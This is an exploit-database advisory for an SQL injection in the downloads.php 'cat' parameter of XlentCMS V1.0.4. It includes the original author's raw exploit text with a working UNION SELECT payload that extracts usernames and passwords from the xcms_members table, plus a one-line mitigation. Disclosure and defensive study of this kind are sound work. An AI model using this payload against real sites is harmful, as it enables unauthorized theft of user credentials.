XlentCMS V1.0.4 (downloads.php?cat) SQL Injection Vulnerability

vendor:

XlentCMS

by:

Gamoscu

CVSS

HIGH

SQL Injection

CWE

Product Name: XlentCMS

Affected Version From: XlentCMS V1.0.4

Affected Version To: XlentCMS V1.0.4

Patch Exists: No

Related CWE: N/A

CPE: a:xlentprojects:xlentcms:1.0.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

XlentCMS V1.0.4 (downloads.php?cat) SQL Injection Vulnerability

XlentCMS V1.0.4 is vulnerable to a SQL injection vulnerability in the downloads.php?cat parameter. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a SQL query.

Source

Exploit-DB raw data:

 Script      : XlentCMS V1.0.4 (downloads.php?cat) SQL Injection Vulnerability

 Script site : http://sphere.xlentprojects.se/portal.php 

 AUTHOR      : Gamoscu
   
 HOME        : http://www.1923turk.biz

 Blog        : http://gamoscu.wordpress.com/

 Greetz      : Manas58 Baybora Delibey Tiamo Psiko Turco infazci X-TRO
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------
http://www.xxx.com/path/downloads.php?cat=[SQL]

Example:

1+union+select+1,id,3,4,username%20,password,7,8,9+from+xcms_members--


Vatan Lafla De&#65533;il Eylemle Sevilir

Kiskananlar catlasin Zorunuza Gitmesin